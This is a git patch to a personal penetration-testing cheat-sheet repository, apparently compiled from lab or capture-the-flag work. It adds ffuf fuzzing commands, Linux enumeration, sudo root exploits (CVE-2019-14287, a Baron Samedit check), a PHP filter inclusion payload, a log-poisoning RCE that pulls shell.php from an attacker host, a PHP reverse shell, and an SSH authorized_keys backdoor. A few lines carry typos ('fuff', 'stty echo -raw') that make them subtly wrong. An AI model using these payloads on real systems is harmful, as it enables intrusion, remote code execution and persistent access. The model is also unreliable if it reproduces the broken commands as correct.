From 853d3ee2bbbedd67f44cb75cee0da74f2e6e64e0 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Fri, 27 Aug 2021 00:26:26 +0200
Subject: [PATCH] fuff et al

---
 enumeration/Sublist3r                   |  1 +
 enumeration/docs/ffuf.md                | 41 +++++++++++++++++++++++++
 enumeration/docs/linux_basics.md        | 37 ++++++++++++++++++++++
 enumeration/nmap-full.gnmap             |  4 ---
 enumeration/nmap-full.nmap              | 19 ------------
 enumeration/nmap-full.xml               | 35 ---------------------
 exploit/sudo/CVE_2019_14287.md          |  9 ++++++
 exploit/sudo/baron_samedit.md           | 13 ++++++++
 exploit/web/php/php_base64_filter.md    |  6 ++++
 exploit/web/{ => php}/php_image_exif.md |  0
 exploit/web/php/php_user_agent_rce.md   | 19 ++++++++++++
 misc/printer_hacking/PRET               |  1 +
 misc/printer_hacking/preta.md           |  4 +++
 reverse_shells/docs/shell_collection.md | 31 +++++++++++++++++++
 14 files changed, 162 insertions(+), 58 deletions(-)
 create mode 160000 enumeration/Sublist3r
 create mode 100644 enumeration/docs/ffuf.md
 create mode 100644 enumeration/docs/linux_basics.md
 delete mode 100644 enumeration/nmap-full.gnmap
 delete mode 100644 enumeration/nmap-full.nmap
 delete mode 100644 enumeration/nmap-full.xml
 create mode 100644 exploit/sudo/CVE_2019_14287.md
 create mode 100644 exploit/sudo/baron_samedit.md
 create mode 100644 exploit/web/php/php_base64_filter.md
 rename exploit/web/{ => php}/php_image_exif.md (100%)
 create mode 100644 exploit/web/php/php_user_agent_rce.md
 create mode 160000 misc/printer_hacking/PRET
 create mode 100644 misc/printer_hacking/preta.md
 create mode 100644 reverse_shells/docs/shell_collection.md

diff --git a/enumeration/Sublist3r b/enumeration/Sublist3r
new file mode 160000
index 0000000..729d649
--- /dev/null
+++ b/enumeration/Sublist3r
@@ -0,0 +1 @@
+Subproject commit 729d649ec5370730172bf6f5314aafd68c874124
diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md
new file mode 100644
index 0000000..7b8001c
--- /dev/null
+++ b/enumeration/docs/ffuf.md
@@ -0,0 +1,41 @@
+# Fuzz Faster U Fool
+
+## Usage
+```sh
+ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
+```
+* Fuzz dirs
+```sh
+ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
+```
+* Fuzz files
+```sh
+ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
+```
+
+### Fuzz parameters
+```sh
+ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
+ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
+```
+* Fuzz values
+```sh
+seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
+```
+* Fuzz Post Methods
+```sh
+ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
+```
+
+### Fuzz Subdomains
+```sh
+ffuf -u http://FUZZ.test.com -c -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
+```
+* Fuzz Vhosts & Server Blocks
+```sh
+ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
+ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
+```
+
+### Proxy
+* `-replay-proxy <IP>` or `-x <ProxyIP>`
diff --git a/enumeration/docs/linux_basics.md b/enumeration/docs/linux_basics.md
new file mode 100644
index 0000000..64d29cb
--- /dev/null
+++ b/enumeration/docs/linux_basics.md
@@ -0,0 +1,37 @@
+# Linux Basic Enumeration
+```sh
+less ~/.bash_history
+```
+```sh
+cat /etc/*-release
+cat /proc/version
+uname -a
+```
+```sh
+sudo -V
+sudo -L
+```
+* Check if  is writeable
+```sh
+vim /etc/passwd
+vim /etc/hosts
+```
+```sh
+crontab -l
+```
+
+* Find interesting files
+```sh
+find / -perm /6000 2>/dev/null
+find / -perm -u=s -type f 2>/dev/null
+find / -type f -name "*.log" 2>/dev/null
+find / -type f -name "*.bak" 2>/dev/null
+find / -type f -name "*.conf" 2>/dev/null
+```
+
+* Open Sockets
+```sh
+lsof -i
+netstat -natup
+ss -natup
+```
diff --git a/enumeration/nmap-full.gnmap b/enumeration/nmap-full.gnmap
deleted file mode 100644
index c7edec2..0000000
--- a/enumeration/nmap-full.gnmap
+++ /dev/null
@@ -1,4 +0,0 @@
-# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
-Host: 10.10.156.247 ()	Status: Up
-Host: 10.10.156.247 ()	Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
-# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
diff --git a/enumeration/nmap-full.nmap b/enumeration/nmap-full.nmap
deleted file mode 100644
index 7ffc626..0000000
--- a/enumeration/nmap-full.nmap
+++ /dev/null
@@ -1,19 +0,0 @@
-# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
-Nmap scan report for 10.10.156.247
-Host is up (0.064s latency).
-Not shown: 64293 closed ports, 1231 filtered ports
-Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
-PORT      STATE SERVICE
-135/tcp   open  msrpc
-139/tcp   open  netbios-ssn
-445/tcp   open  microsoft-ds
-3389/tcp  open  ms-wbt-server
-31337/tcp open  Elite
-49152/tcp open  unknown
-49153/tcp open  unknown
-49154/tcp open  unknown
-49155/tcp open  unknown
-49161/tcp open  unknown
-49162/tcp open  unknown
-
-# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
diff --git a/enumeration/nmap-full.xml b/enumeration/nmap-full.xml
deleted file mode 100644
index 40c82ff..0000000
--- a/enumeration/nmap-full.xml
+++ /dev/null
@@ -1,35 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE nmaprun>
-<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
-<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247 -->
-<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
-<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
-<verbose level="0"/>
-<debugging level="0"/>
-<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
-<address addr="10.10.156.247" addrtype="ipv4"/>
-<hostnames>
-</hostnames>
-<ports><extraports state="closed" count="64293">
-<extrareasons reason="resets" count="64293"/>
-</extraports>
-<extraports state="filtered" count="1231">
-<extrareasons reason="no-responses" count="1231"/>
-</extraports>
-<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
-<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
-<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
-<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
-<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
-<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
-</ports>
-<times srtt="64161" rttvar="6610" to="100000"/>
-</host>
-<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
-</runstats>
-</nmaprun>
diff --git a/exploit/sudo/CVE_2019_14287.md b/exploit/sudo/CVE_2019_14287.md
new file mode 100644
index 0000000..8c9a582
--- /dev/null
+++ b/exploit/sudo/CVE_2019_14287.md
@@ -0,0 +1,9 @@
+# CVE-2019-14287
+
+* Versions < 1.8.28
+
+## Usage 
+* Integer overflow with resulting root status.
+```sh
+sudo -u#-1 <app>
+```
diff --git a/exploit/sudo/baron_samedit.md b/exploit/sudo/baron_samedit.md
new file mode 100644
index 0000000..eaf8fab
--- /dev/null
+++ b/exploit/sudo/baron_samedit.md
@@ -0,0 +1,13 @@
+# CVE-2021-3156 Baron Samedit
+
+* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
+* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
+* Heap based overflow
+* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
+* Check vulnerability via
+```sh
+sudoedit -s '\' $(python -c "print('\x41' * 10000)")
+```
+
+
+
diff --git a/exploit/web/php/php_base64_filter.md b/exploit/web/php/php_base64_filter.md
new file mode 100644
index 0000000..cac118b
--- /dev/null
+++ b/exploit/web/php/php_base64_filter.md
@@ -0,0 +1,6 @@
+# PHP Filter
+
+* Include into GET query, and get index page, for example
+```sh
+<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
+```
diff --git a/exploit/web/php_image_exif.md b/exploit/web/php/php_image_exif.md
similarity index 100%
rename from exploit/web/php_image_exif.md
rename to exploit/web/php/php_image_exif.md
diff --git a/exploit/web/php/php_user_agent_rce.md b/exploit/web/php/php_user_agent_rce.md
new file mode 100644
index 0000000..402710a
--- /dev/null
+++ b/exploit/web/php/php_user_agent_rce.md
@@ -0,0 +1,19 @@
+# RCE inside HTTP Request
+
+* User Agent can be filled with php code
+```sh
+GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
+Host: 10.10.59.238
+User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
+[...]
+```
+
+* copied from browser as curl command:
+```
+curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
+```
+* go to the access log
+```sh
+10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
+```
+* Afterwards visit `10.10.211.157/monkey.php`
diff --git a/misc/printer_hacking/PRET b/misc/printer_hacking/PRET
new file mode 160000
index 0000000..40505ce
--- /dev/null
+++ b/misc/printer_hacking/PRET
@@ -0,0 +1 @@
+Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd
diff --git a/misc/printer_hacking/preta.md b/misc/printer_hacking/preta.md
new file mode 100644
index 0000000..cb8bdab
--- /dev/null
+++ b/misc/printer_hacking/preta.md
@@ -0,0 +1,4 @@
+# Printer Hacking
+
+* [Preta](https://github.com/RUB-NDS/PRET)
+* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
diff --git a/reverse_shells/docs/shell_collection.md b/reverse_shells/docs/shell_collection.md
new file mode 100644
index 0000000..d22380b
--- /dev/null
+++ b/reverse_shells/docs/shell_collection.md
@@ -0,0 +1,31 @@
+# Upgrade Reverse Shell 
+
+## Via interpreter
+### PHP
+* reverse shell
+```php
+php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+```php
+php -r 'exec ("/bin/bash")";' 
+```
+* Sometimes even
+```php
+php -e 'exec "/bin/bash";'
+```
+
+### Python 
+```python
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+
+## Next
+1. `ctrl` + `z`
+2. `stty echo -raw`
+3. `fg`
+4. `export TERM=xterm`
+
+## Via SSH
+* `ssh-keygen`
+* copy priv key and `chmod 600`
+* `cat id_rsa.pub > authorized_keys` on target